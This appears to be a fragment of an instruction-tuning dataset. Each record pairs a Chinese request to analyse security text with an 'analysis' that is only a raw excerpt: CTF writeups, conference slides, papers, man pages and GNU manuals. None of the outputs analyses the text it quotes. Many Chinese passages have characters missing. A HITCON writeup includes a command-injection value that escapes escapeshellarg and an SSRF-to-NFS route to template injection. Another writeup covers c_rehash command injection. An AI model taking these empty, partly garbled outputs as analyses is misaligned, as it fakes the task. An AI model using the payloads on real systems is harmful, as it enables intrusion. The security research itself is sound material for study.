JOptionPane.showMessageDialog((Component)null, var6.getMessage(), \"Error\", 0); System.exit(0); } } 1 2 3 4 5 6 7 8 9 10 3 所以我们在使javaagent时带上-XX:+DisableAttachMechanis这个启动选项 这开发脱壳agent嫖了Twi1ight师傅得CSAgent的模板代码感谢佬的代码脚本表示 嫖真最后脱壳后的件会保存在java运的当前录下名字以xxx_unpacked.jar命名 https://github.com/yougar0/AntiDecAgent 脱壳效果 开源地址 Java 复制代码 java -javaagent:CSAgent-1.4-SNAPSHOT-jar-with-dependencies.jar - XX:+DisableAttachMechanism -jar xxx.jar 1", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 加固 --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- ## 大纲 * **[基线核查](#基线核查)** * **[操作系统](#操作系统)** * [Linux](#linux) * [Windows](#windows) * **[web服务和中间件](#web服务和中间件)** * **[业务软件](#业务软件)** * [数据库](#数据库) * [mysql](#mysql) * [远程服务](#远程服务) * [SSH](#ssh) --- ## 基线核查 **资源** - [CIS Benchmarks](https://learn.cisecurity.org/benchmarks) - 安全配置建议,内容很多,虽然是英文版本 - [re4lity/Benchmarks](https://github.com/re4lity/Benchmarks) - 常用服务器数据库中间件安全配置基线 - [trimstray/linux-hardening-checklist](https://github.com/trimstray/linux-hardening-checklist) - linux 安全配置的核查 **相关工具** - [lis912/CapOS](https://github.com/lis912/CapOS) - 等级保护测评 windows 基线检查 - [lis912/Evaluation_tools](https://github.com/lis912/Evaluation_tools) - 安全基线检查工具 - [xiaoyunjie/Shell_Script](https://github.com/xiaoyunjie/Shell_Script) - Linux 系统检测和加固脚本 - [CISOfy/lynis](https://github.com/CISOfy/lynis) - 基于 UNIX 系统例如 LinuxmacOSBSD 等的安全审核工具 - [tangjie1/-Baseline-check](https://github.com/tangjie1/-Baseline-check) - windows和linux基线检查配套自动化检查脚本 - [chroblert/SecurityBaselineCheck](https://github.com/chroblert/SecurityBaselineCheck) - 安全基线检查平台 --- ## 操作系统 ### Linux - [Secure-Linux](../../Integrated/Linux/Secure-Linux.md) ### Windows - [Secure-Win](../../Integrated/Windows/Secure-Win.md) **相关文章** - [Windows安全加固](https://www.freebuf.com/column/201869.html) - [Windows服务器主机加固分享](https://www.freebuf.com/articles/system/215787.html) - [windows安全防护](https://www.freebuf.com/column/195870.html) **相关工具** - [vletoux/pingcastle](https://github.com/vletoux/pingcastle) - Active Directory Security **加固指南** - [beerisgood/Windows11_Hardening](https://github.com/beerisgood/Windows11_Hardening) - A collection about Windows 11 security --- ## web服务和中间件 **相关文章** - [PHP安全我见](https://www.leavesongs.com/PENETRATION/php-secure.html) --- ## 业务软件 ### 数据库 #### mysql **删除匿名帐户** ```sql mysql> delete from user where user=''; mysql> flush privileges; ``` **检查是否有不恰当的授权文件** ```bash ls -al .bash_history # 应为 600 权限 ls -al /etc/my.cnf # 应为 644 权限 find", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExploring Layer 2 Network Security in Virtualized Environments Ronny L. Bull, Jeanna N. Matthews Wallace H. Coulter School of Engineering Clarkson University Potsdam, NY 13699 Email: {bullrl, jnm}@clarkson.edu AbstractCloud service providers offer their customers the ability to deploy virtual machines in a multi-tenant environment. These virtual machines are typically connected to the physical network via a virtualized network configuration. This could be as simple as a bridged interface to each virtual machine or as complicated as a virtual switch providing more robust networking features such as VLANs, QoS, and monitoring. In this paper, we explore whether Layer 2 network attacks that work on physical switches apply to their virtualized counterparts by performing a systematic study across four major hypervisor environments - Open vSwitch, Citrix XenServer, Microsoft Hyper-V Server and VMware vSphere - in seven different virtual networking configurations. First, we use a malicious virtual machine to run a MAC flooding attack and evaluate the impact on co-resident VMs. We find that network performance is degraded on all platforms and that it is possible to eavesdrop on other client traffic passing over the same virtual network for Open vSwitch and Citrix XenServer. Second, we use a malicious virtual machine to run a rogue DHCP server and then run multiple DHCP attack scenarios. On all four platforms, co-resident VMs can be manipulated by providing them with incorrect or malicious network information. KeywordsVirtualization, Networking, Network Security, Cloud Security, Layer 2 Attacks. I. INTRODUCTION With the growing popularity of Internet-based cloud service providers, many businesses are turning to these services to host their mission critical data and applications. Cloud customers often deploy virtual machines to shared, remote, physical com- puting resources. Virtual machines running in cloud capacity are connected to the physical network via a virtualized network w", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFuzzing Malware for Fun & Profit. Applying Coverage-Guided Fuzzing to Find Bugs in Modern Malware Maksim Shudrak DEF CON 26 About Me BIO 2018  present: Senior Offensive Security Researcher 2016: Defended PhD (Vulns Hunting) in Tomsk, Russia 2015-2017: Researcher, IBM Research, Haifa, Israel 2011-2015: Security Researcher, PhD student Interests Vulnerabilities Hunting Fuzzing Reverse-engineering Malware Analysis Dynamic Binary Instrumentation Projects Drltrace  transparent API-calls tracing for malware analysis https://github.com/mxmssh/drltrace WinHeap Explorer  PoC for heap-based bugs detection in x86 code https://github.com/WinHeapExplorer/WinHeap-Explorer IDAMetrics  IDA plugin for machine code complexity assessment https://github.com/mxmssh/IDAmetrics Introduction & Motivation Why coverage-guided fuzzing ? Fuzzer overview & architecture Fuzzer usage & demo Case Studies. Mirai + vulnerability demo Case Studies. TinyNuke, KINS, Dexter Discussion, Future Work & Conclusion Motivation . Complex Parsers -  Motivation . Complex Parsers I am so #@$%* tired of writing this algorithm. Motivation . Complex Parsers Motivation. Low Code Quality Motivation. It is Fun! Related Works  DEF CON 25 Offensive Malware Analysis: Dissecting OSX/FruitFly via a Custom C&C Server by Patrick Wardle  DEF CON 25 Digital Vengeance: Exploiting the Most Notorious C&C Toolkits by Professor Plum  Targeted attacks: From being a victim to counter attacking by Andrzej Dereszowski (SIGNAL 11)  Malware fuzzing:  Rasthofer, S., Arzt, S., Triller, S. and Pradel, M., 2017, May. Making malory behave maliciously: Targeted fuzzing of android execution environments. In Software Engineering (ICSE), 2017 IEEE/ACM 39th International Conference on (pp. 300-311). IEEE.  F. Peng, Z. Deng, X. Zhang, D. Xu, Z. Lin, and Z. Su. X-force: Force executing binary programs for security applications. In Proceedings of the 2014 USENIX Security Symposium, San Diego, CA (August 2014), 2014 Legal Issues  Hacking-back is mostly", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 第NS届全国学知识竞赛 初赛 online_crt writeup 项分析 解题 c_rehash 利条件 go server url注http头 go的RawPath特性 构造利链 第步 第步 使baseTQ 编码 使截断环境变量 使现有环境变量 第三步 总结 author:帽酱 题给了后端源码 道题利了前不久出现的个鸡肋洞 题还是较有意思的 项后端是pyhton + go pyhton的服务直接暴露给户 pyhton服务 共有4个路由 /getcrt 成个x509证书 /createlink 调 c_rehash 创建证书链接 项分析 2 /proxy 通过代理访问go服务 Python 复制代码 @app.route('/', methods=['GET', 'POST']) def index(): return render_template(\"index.html\") @app.route('/getcrt', methods=['GET', 'POST']) def upload(): Country = request.form.get(\"Country\", \"CN\") Province = request.form.get(\"Province\", \"a\") City = request.form.get(\"City\", \"a\") OrganizationalName = request.form.get(\"OrganizationalName\", \"a\") CommonName = request.form.get(\"CommonName\", \"a\") EmailAddress = request.form.get(\"EmailAddress\", \"a\") return get_crt(Country, Province, City, OrganizationalName, CommonName, EmailAddress) @app.route('/createlink', methods=['GET']) def info(): json_data = {\"info\": os.popen(\"c_rehash static/crt/ && ls static/crt/\").read()} return json.dumps(json_data) @app.route('/proxy', methods=['GET']) def proxy(): uri = request.form.get(\"uri\", \"/\") client = socket.socket() client.connect(('localhost', 8887)) msg = f'''GET {uri} HTTP/1.1 Host: test_api_host User-Agent: Guest Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ''' client.send(msg.encode()) data = client.recv(2048) client.close() return data.decode() 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 3 go后端有个admin路由 于重命名证书件 题中出现了 c_rehash c_rehash是openssl中的个perl编写的脚本具 于批量创建证书等件 hash命名的符号链接 最近c_rehash 出了个命令注漏洞 (CVE-2022-1292) 经过搜索上并没有公开的exp (可能因为这个漏洞常鸡肋) 只能通过diff进分析 解题 c_rehash Python 复制代码 func admin(c *gin.Context) { staticPath := \"/app/static/crt/\" oldname := c.DefaultQuery(\"oldname\", \"\") newname := c.DefaultQuery(\"newname\", \"\") if oldname == \"\" || newname == \"\" || strings.Contains(oldname, \"..\") || strings.Contains(newname, \"..\") { c.String(500, \"error\") return } if c.Request.URL.RawPath != \"\" ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGNU Readline Library User Interface Edition 6.1, for Readline Library Version 6.1. October 2009 Chet Ramey, Case Western Reserve University Brian Fox, Free Software Foundation This manual describes the end user interface of the GNU Readline Library (version 6.1, 9 October 2009), a library which aids in the consistency of user interface across discrete programs which provide a command line interface. Copyright c 19882009 Free Software Foundation, Inc. Permission is granted to make and distribute verbatim copies of this manual provided the copyright notice and this permission notice are preserved on all copies. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, with the Front-Cover texts being A GNU Manual, and with the Back-Cover Texts as in (a) below. A copy of the license is included in the section entitled GNU Free Documentation License. (a) The FSFs Back-Cover Text is: You are free to copy and modify this GNU manual. Buying copies from GNU Press supports the FSF in developing GNU and promoting software freedom. Published by the Free Software Foundation 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA i Table of Contents 1 Command Line Editing . . . . . . . . . . . . . . . . . . . . . . . . 1 1.1 Introduction to Line Editing. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 1.2 Readline Interaction. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 1.2.1 Readline Bare Essentials. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 1.2.2 Readline Movement Commands. . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 1.2.3 Readline Killing Commands . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 1.2.4 Readline Arguments. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n周末hitconctf2021两道题简单记录 W3rmup PHP这题有两个考点结合起来较有趣先是题中这个循环考察的是经典的循环体中改变被 遍历对象的度导致遍历不全的bug我们只要传类似 $arr= ['123', false, \"';$(id)'\"] 这样的数组 就可以绕过 escapeshellarg 的过滤逃逸单引号因为在循环到 $arr[1] 时由于unset的作 $arr 数组度 会变成2这样在下次循环就法满 $i<count($arr) 直接结束了 题第2个考点是php的 yaml_parse 使的是yaml1.1的协议会将 NO 解析为布尔值false NO 恰巧是挪 威的country_code所以我们只需要挪威(NO)的ip请求这个题就能得到个满条件的数组执任意命令 了这个在 yaml_psrse 档下条评论中有提到:D Metamon-Verse这个题单独环境flask开启了 app.config['TEMPLATES_AUTO_RELOAD'] = True 选项所以 意思很明显就是让你SSRF->写件SSRF是调了pycurlpycurl是libcurl的封装所以持curl持的所有协 议较好的就是 file 读件和 gopher 发tcp payload题唯能打的内服务就是nfsnfs共享的录 是 /app/static/images 模版件在 /app/templates/ 下法直接逃逸出共享录写模板件这些 是前提条件 这道题的思路就是ssrf打nfs-server的2049端告诉nfs-server我创建了个 /app/templates/index.html -> ./xxx.jpg 的软链接软链接可以指向共享录外很关键之所以存在这个包也是因为nfs协议持同步软链 接但linux的软链接毕竟没有真的内容所以nfs做法就是这样个包告诉nfs-server在服务端创建个摸 样的链接有点基因复制的味道了然后nfs-server傻乎乎的在服务器上创建这个软链接之后这个软链接会 被反过来同步到nfs-client上这样就通过SSRF nfs server实现了在nfs-client的共享录中创建了个指向模板 件的软链接xxx.jpg然后就可以利题的保存图的功能向模板件中写模板字符串xxx这个名字是根据 $yaml = <<<EOF - echo # cmd - $addr # address - $country # country - $mail # mail EOF; $arr = yaml_parse($yaml); if (!$arr) die('bad yaml'); for ($i=0; $i < count($arr); $i++) { if (!$arr[$i]) { unset($arr[$i]); continue; } $arr[$i] = escapeshellarg($arr[$i]); } system(implode(\" \", $arr)); remote_addr+url算出来的最后请求即可渲染模板执任意命令 这题恶的地在于nfs协议的复杂所以成nfs协议的SSRF payload的路较艰经过下午调试最终确 定了nfs v3的三个包可以实现上述的 1. 第1个包是与nfs-server的111/tcp端通信可以获取到个随机的端P 2. 第2个包是与nfs-server的端P/tcp通信可以获取到个叫做 file handle 的参数 3. 第3个包是与nfs-server的2049/tcp通信带上 file handle 参数可以执nfs v3的SYMLINK操作击 命中靶 12两个包可以通过下这个命令发出 需要注意的就是 -o vers=3,tcp 参数前个指定协议版本后个指定使 tcp 协议默认是udp的curl 好像法通过udp发这些包 还有就是第23两个包是需要源端是 privileged port 的即 <1024 端这可以通过设置 LOCALPORT=233 参数来指定因为题的docker启动时指定了 --privileged 参数所以即使题是 nobody 权限运依然可 以绑定权限端111端是 rpcbind ,端P好像是 rpc.mountd ,这些应该是和nfs v3的架构有关系这不深 究 还有最后个看似很的考点就是gohper协议把这些包发过去后由于法设置超时时间会直卡着由于 curl有缓存所以我们会拿不到第个包的输出 file handle 解决办法是在url后加个 %0d%0a 看流量 是 0d0a 是个RPC的continuation包111端在收到之后主动与client四次挥了所以 0d0a 应该是相当于 个结束符 赛后复盘发现nfs v4.0更好", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking IIS w/ shubs Dealing with HTTPAPI 2.0 Assets Have you seen this before?  Either, youre missing the subdomain associated with the IP address (No SSL certificate)  Or the subdomain doesnt resolve but you can obtain a full/partial subdomain from the SSL certificate Resolving the HTTPAPI 2.0 404 Error  This is super simple, but often people skip assets when they see the HTTPAPI 2.0 404 error. This error usually means that the asset needs the correct host header to route to the application.  Youre not always fortunate enough to have the full subdomain provided to you via the SSL certificate.  If you know the hostname, simply provide the hostname in the HTTP Host header.  Sometimes you have to bruteforce VHosts until you can access the application. After fixing the host header  Add a line to your /etc/hosts file to map the correct host name to the IP address of the asset.  Run all of your scanning again, including your enumeration through IIS shortname scanner.  Perform VHost enumeration/bruteforcing to see if there are any other applications that are present on the host.  Find all other assets that respond with HTTPAPI 2.0 404 errors and apply the same workflow (rinse and repeat). VHost Hopping Accessing an internal admin panel via VHost Hopping ($1900)  Came across an asset that looked something like apply.company.com running IIS.  Used a large subdomain wordlist to bruteforce VHosts using Burp Intruder (%bruteforce%.company.com).  Large and different response returned for mssql.company.com which was not accessible externally, only accessible through VHost Hopping.  This was running a MSSQL database manager/explorer (https:// sourceforge.net/projects/asp-ent-man/). Accessing the VHost  Often, on IIS servers, there may be internal applications running under a different host name. Host name bruteforcing / VHost hopping is very effective in IIS environments.  A simple match and replace rule to facilitate the access: Reap the benefits Reap the benefits Local File Di", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHarm Reduction A Framework For Effective & Compassionate Security Guidance Kyle Tobener Blackhat 2022 Tiktok: @kyle.tobener Twitter: @kylekyle Story time DARE, Every 15, and similar programs likely increase alcohol intake. Why am I telling you this? Imagine that was your security program I want to help you give better security guidance Im Kyle, harm reduction enthusiast 1. Accept that risk taking behaviors are here to stay 2. Prioritize reduction of negative consequences 3. Embrace compassion while providing guidance Lets talk security guidance Example #1 Example #2 Example #3 This is use reduction Whats the harm? Nothing done about original incentives Use reduction may add social stigma Behaviors may have community impact Iatrogenesis Harm Reduction Enters The Chat Defining Harm Reduction: A set of practical strategies and ideas aimed at reducing the negative consequences associated with various human behaviors Origins of Harm Reduction Note: use reduction still relevant Applying Harm Reduction to Security 1. Accept that risk taking behaviors are here to stay 2. Prioritize reduction of negative consequences 3. Embrace compassion while providing guidance Why? Risk taking behaviors occur for a reason Use Reduction Is Not Efficient Use reduction programs can have unintended consequences. Iron Law of Prohibition Abstinence violation effect What does the research show?  Alcohol Prohibition  Initial drop of 70% receded to 30% reduction over time.  Annual enforcement costs rose from $6M to $13M  Teenage Pregnancy Prevention  Title V of the Social Security Act effectively guarantees >$100 Million for abstinence based pregnancy prevention  6 years of congressional research found no program had any significant impact on stopping or delaying sex.  War on drugs  Since 1971 the United States spent > $1 trillion dollars  Has not eradicated drug trade, potentially increased it.  D.A.R.E.  Drug Abuse and Resistance Education program  Research shows it was entirely ineffective and ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDan Hubbard VP Security Research Perpetual Beta = Live Testing = Trouble Airline Terminals using Active Script Start : Middle : End Wait, the Web has version numbers? Web Two Dot UH-OH or Exploit 2.0 An introduction to HoneyJax  Definitions  Reasons for deploying them  Types: Passive, Active HoneyJax, Passive Aggressive  Reporting data from Accounts  Disclosure for web site vulnerabilities  Legal Aspects / Grab Bag Conclusion One of these things is not like the other Its a bird, is it a plane, no its Web 2.0 : 80% top 20 Web sites have Web 2.0 philosophies (src: OREILLY) XML HTTP Request When Microsoft created XMLHttpRequest in Internet Explorer 5, which let browser-side JavaScript communicate with the web server in the background without requiring the browser to display a new web page. That made it possible to develop more fluid and responsive web applications. Mozilla soon implemented XMLHttpRequest in its browsers, as did Apple (in the Safari browser) and Opera. Several dozen *very* loosely defined standards mashed together At the heart of it all are JavaScript and XML Web Two Dot Uh-Oh Losing control of your destiny: User Created Content Who do you trust: Social Networks Unattended Installs and Code Injection: R.S.S Mushy Peas: Mash-ups ANY ANY PORT 80: Security is often the last ones to know But I have a firewall: Its about the information not the network If I told you to jump of a bridge: Its just sooooo easy and being web 2.0 is cool Threats User-created content Property owner gives / leases space to user 400 Million + pages change dramatically close real-time Content stripping done but very difficult to enforce (JavaScript obfuscation deluxe) Easy to test for vulnerabilities, little disclosure: Can you say Web borne Worms Allow dynamic/graphic content (jscript, qt, mov) Trust within user-networks Used a many-to-many communication platform User-created Content Hidden IFRAME w/WMF, CSS auth page phish, Wikipedia Trojan Social Networks (1 account : 70M views ~2", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" .\\\" 软件教程 之 man mirror 系统篇 软件篇 技巧篇 Linux man篇 .\\\" .\\\" 原始文件mirror-2.3 - mirror.man .\\\" 档案叙述映射远端档案的软体 .\\\" 文件编号LRG.LDTP.MANUAL.006 .\\\" 翻译日期1996/03/03 .\\\" 翻译维护asdchen@ms1.hinet.net O .\\\" ---------------------------------------------------------------Ｘ--- .\\\" O .\\\" MIRROR(1L) MIRROR(1L) .\\\" .TH mirror 1 .SH NAME mirror \\- 映射在远端节点上的档案 .SH \"总览 SYNOPSIS\" mirror [flags] -gsite:pathname mirror [flags] [package-files] .SH \"描述 DESCRIPTION\" Mirror 是以 Perl 所写成的一套在执行它的机器与一台远端主机 之间使用 ftp 协定复制整个目录架构及其内容的软体它藉由在 传输之前比较档案时间(time-stamps) 以及大小来避免拷贝不必要 的档案除此之外它还可以选择性地压缩(compress, gzip)以及 分割(split)档案 .PP 它是写给档案维护人员使用的但也可以让任何想要经由 ftp 传输 大量档案的人使用 .PP 无论如何叫用它 mirror 总是执行相同的几个基本步骤它连线 到远端节点在内部建立本地目标目录(target direction)的目录 列表为远端目录建立一份目录列表比较它们建立任何必须的 子目录传输适当的档案设定它们的档案时间以符合远端节点上 的档案时间建立任何符号链结然後移除任何已不必要的物件 (objects) 最後并结束连线 .PP Mirror 可以处理符号链结但并非原本的链结它不会复制拥有者 (owner)或是群组(group)的资讯如果你需要这些选项其中的任何 一个使用 rdist(1) 来取代它 .PP Mirror 系以上面所列语法概述其中的一种方法呼叫执行 .PP 第一种方式是用来将一个远端目录撷取回现行目录如果你要映射 的是一个目录最好是以斜线('/') 来结束路径名称这样一来远端 递回列表包含往下子目录的列表会比较小或者是使用 -r 旗标 来禁止递回参阅下面所述的 -g 旗标这个方式将不会使用到 mirror.defaults 档案 .PP 在上面所列语法概述的第二种方式里至少需要有一份最少数目的 参数而且 mirror 是由从配置档案或标准输入里读取的设定所 控制如果可以在 mirror 执行档所在目录或是 PERLLIB 路径里 找到一个名为 mirror.defaults 档案那麽它会首先被载入这 用来为所有的配置档提供一般化的预设值 .PP Mirror 本来是为映射远端 Un*x 系统的档案而写但是它已逐渐 成长(like topsy) .PP .SH \"标记 FLAGS\" .TP -d 启动侦错如果下达这个参数超过一次则侦错层级将会 递增目前有用的最大层级是四 .TP -ppackage 只映射所给定的档案包裹(package) 此选项可下达多次 在这种情形下所有给定的档案包裹都将会映射没有这个 选项的话将映射所有的档案包裹档案包裹 (package) 是一个符合相对於 package 变数的正规表示式(regexp) .TP -R 类似 -p 但是跳过所有的档案包裹直到它找到给定的档案 包裹为止这对於从 mirror 执行失败而离开的地方重新 开始执行会有用 .TP -n 除了比较本地以及远端的目录之外不做任何事不会执行 任何档案传输将侦错层级设为二所以你可以看到对於 将要执行之动作的追踪 .TP -F 使用暂存的 dbm 档案以储放关於档案的资讯如果你要 映射一个非常大的目录这会有用参阅 use_files 这个 变数 .TP -g 节点:路径 .PP 取得给定节点上的所有档案如果路径符合 .*/.+ 那麽 它是目录的名称而後面的部份则是所要取得之档案名称的 样板(pattern) 如果路径符合 .*/ 则它是目录的名称 而且其所有的内容都将会被撷取另一方面路径还是用 在 '/' 的样板如果你使用 host:/fred 的话那麽将作出 一份远端主机上之 / 的完整目录列表如果所有你想要 的是目录 /fred 的内容则指定 host:/fred/ 才是 .TP \\-r 等於 -krecursive=false .TP \\-v 印出 mirror 版本资讯细节并结束 .TP \\-T 强制将任何本地档案的时间重置成与远端档案相同一般 仅用於以", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npwdx === 用于显示指定进程的当前工作目录 ## 内建命令 ### 概要 ```shell pwdx [进程ID] ``` ### 参数说明 - `进程ID`要查询的进程ID可以使用 `ps` 命令查看 ## 示例 下面示例中使用 `ps` 命令查看 `nginx` 进程的信息然后使用 `pwdx` 命令查询进程ID为 `5678` 的进程的当前工作目录 ```bash $ ps -ef | grep nginx # root 1234 1 0 10:00 ? 00:00:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on; # www-data 5678 1234 0 10:01 ? 00:00:00 nginx: worker process $ pwdx 5678 # 5678: /var/www/html ``` 查看当前进程的工作目录 ```bash $ pwdx $$ ``` 查看指定进程的工作目录 ```bash $ pwdx 1234 ``` 批量查看多个进程的工作目录 ```bash $ ps aux | awk '{print $2}' | xargs pwdx ``` 结合其他命令查看某个进程的工作目录和命令行 ```bash $ ps -p 1234 -o cmd | tail -n 1 | awk '{print $1}' | xargs pwdx ``` 查看所有进程的工作目录 ```bash $ ps -eo pid | xargs pwdx ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Find my intro Category: Web, 100 points ## Description > challenge 1 in Imperva's GQLDating series > > Hi there! I just joined a new dating site called GQL-Dating and I'm so excited :) I hope to find my life partner.. But first, can you please help me inject the schema? ## Solution The attached website is an online dating website which allows registering and searching for other users. While searching for a user, we can see the following request being sent from the site: ```console (user@kali)-[/media/sf_CTFs/technion/Find_my_intro] $ curl 'http://ec2-3-239-182-16.compute-1.amazonaws.com:1234/gql/graphql' -X POST -H 'Content-Type: application/json' --data-raw '{\"operationName\":null,\"variables\":{},\"query\":\"query { getPersonByName(name:\\\"test\\\"){ persons{ id name gender link} } }\"}' {\"data\":{\"getPersonByName\":{\"persons\":[]}}} ``` This is a [GraphQL](https://en.wikipedia.org/wiki/GraphQL) query. Let's see how we can use it to leak data from the DB. We'll use [GraphQLmap](https://github.com/swisskyrepo/GraphQLmap) to interact with the GraphQL endpoint. First, let's dump the schema: ```console (user@kali)-[/media/sf_CTFs/technion/Find_my_intro] $ python3 ~/utils/web/GraphQLmap/graphqlmap.py -u http://ec2-3-239-182-16.compute-1.amazonaws.com:1234/gql/graphql?query={} -v --method POST --json _____ _ ____ _ / ____| | | / __ \\| | | | __ _ __ __ _ _ __ | |__ | | | | | _ __ ___ __ _ _ __ | | |_ | '__/ _` | '_ \\| '_ \\| | | | | | '_ ` _ \\ / _` | '_ \\ | |__| | | | (_| | |_) | | | | |__| | |____| | | | | | (_| | |_) | \\_____|_| \\__,_| .__/|_| |_|\\___\\_\\______|_| |_| |_|\\__,_| .__/ | | | | |_| |_| Author: @pentest_swissky Version: 1.0 GraphQLmap > dump_new ============= [SCHEMA] =============== e.g: name[Type]: arg (Type!) User name[]: email[]: rate[]: Flag hint[]: key[]: FlagResult success[Boolean]: errors[String]: flag[]: Person id[ID]: nickname[]: name[]: last_name[]: joined_at[]: city[]: interest_in[]: gender[]: personal_info[]: link[]: PersonRate id[ID]: nickname[]: name[]: l", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nYour secret files are mine: Bug finding and exploit techniques on file transfer app of all top Android vendors Zhang Xiangqian Liu Huiming About us  Tencent  Largest social media and entertainment company in China  Tencent Security Xuanwu Lab  Applied and real world security research  Members of Advanced Security Team  Zhang Xiangqian(@h3rb0)  Huiming Liu (@liuhm09) Contents  Introduction  Attack Surfaces and Previous Works  Vulnerabilities & Exploit & Demo  Mitigation  Conclusion Introduction  Nearby Transmission Technologies  Bluetooth, Android beam, WiFi hotpot, WiFi Direct  Nearby Sharing on Android  Vendors App  xxxx Share, xxxx Drop   Third Party App  SHAREit, Xender, AirDroid, Send Anywhere  Motivation  Nearby file transfer  Bluetooth/NFC(Android Beam)  Not user friendly enough  Not fast enough  APPs based on Wi-Fi related Technology  Nearly all top Android Vendors have their Nearby file transfer APPs  2018 shipment: nearly a billion android devices (IDC)  Third-party file transfer Apps  Top 10 Apps: nearly a billion users  But are those Apps safe? Android Sharing Apps Android Sharing Apps Android Sharing Apps  Scan The QR code to connect  Shake at the same time   Android Sharing Apps Sharing Process Discover  BLE advertising Name, ID, Device Type ... Pair  Automatic pairing and key exchange Connect  WiFi / WiFi P2P Transfer  Pictures, Apks, Other Files  Attack surface  Adversary:  Attackers can be sniffer and sender of BT and Wi-Fi packets  Damage:  Attackers can get the transferred files  Others: Traffic hijacking, Info leaking, RCE  Attack Surfaces:  Link Establishing  Secure Transmission  Device / ID Spoofing  MITM  Others(Web Server) Link Establishing  Connect automatically  Attackers may join into the network without users permission.  Networks key negotiating  Attackers may obtain the established networks passwords. Secure transmission  No Encryption  Get the file directly  Unsafe key exchange  Recover the real file from the encrypted traffic Device / ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents The Battle Against the Billion-Scale Internet Underground Industry: Advertising Fraud Detection and Defense Zheng Huang | Chief Architect of Security Department, Baidu Shupeng Gao | Senior Security Researcher, Baidu Yakun Zhang | Senior Security Researcher, Baidu Hai Yang | Senior Security Researcher, Baidu Jie Gao | Senior Security Researcher, Baidu #BHUSA @BlackHatEvents Information Classification: General Agenda  Background  Advertising fraud and anti-fraud  In-depth analysis of typical cases  Crowd and key tech analysis  Detection and defense  Summary and recommendations #BHUSA @BlackHatEvents Information Classification: General Advertising Alliance Platform Advertiser Advertiser Advertiser Website APP We Media Mini Program Advertising Style splash ad news feed ad banner ad incentive video ad Background H5 ad #BHUSA @BlackHatEvents Information Classification: General CPC (Cost Per Click) OCPC (Optimized Cost per Click) CPM (Cost Per Mille) CPA (Cost Per Action) PV (Page View) Advertising Alliance one hundred thousand advertiser one hundred thousand APP a billion MAU Advertising Alliance Advertising Alliance Advertising Alliance Background #BHUSA @BlackHatEvents Information Classification: General Agenda  Background  Advertising fraud and anti-fraud  In-depth analysis of typical cases  Crowd and key tech analysis  Detection and defense  Summary and recommendations #BHUSA @BlackHatEvents Information Classification: General Advertising Alliance Platform Advertiser Advertiser Advertiser Website APP We Media Mini Program Advertising Style splash ad news feed ad banner ad incentive video ad Advertising fraud and anti-fraud H5 ad 1 2 3 #BHUSA @BlackHatEvents Information Classification: General Agenda  Background  Advertising fraud and anti-fraud  In-depth analysis of typical cases  Crowd and key tech analysis  Detection and defense  Summary and recommendations #BHUSA @BlackHatEvents Information Classification: General  A data analysis company, we", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGNU History Library Edition 6.1, for History Library Version 6.1. October 2009 Chet Ramey, Case Western Reserve University Brian Fox, Free Software Foundation This document describes the GNU History library (version 6.1, 9 October 2009), a program- ming tool that provides a consistent user interface for recalling lines of previously typed input. Copyright c 19882009 Free Software Foundation, Inc. Permission is granted to make and distribute verbatim copies of this manual provided the copyright notice and this permission notice are preserved on all copies. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, with the Front-Cover texts being A GNU Manual, and with the Back-Cover Texts as in (a) below. A copy of the license is included in the section entitled GNU Free Documentation License. (a) The FSFs Back-Cover Text is: You are free to copy and modify this GNU manual. Buying copies from GNU Press supports the FSF in developing GNU and promoting software freedom. Published by the Free Software Foundation 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA i Table of Contents 1 Using History Interactively . . . . . . . . . . . . . . . . . . . . 1 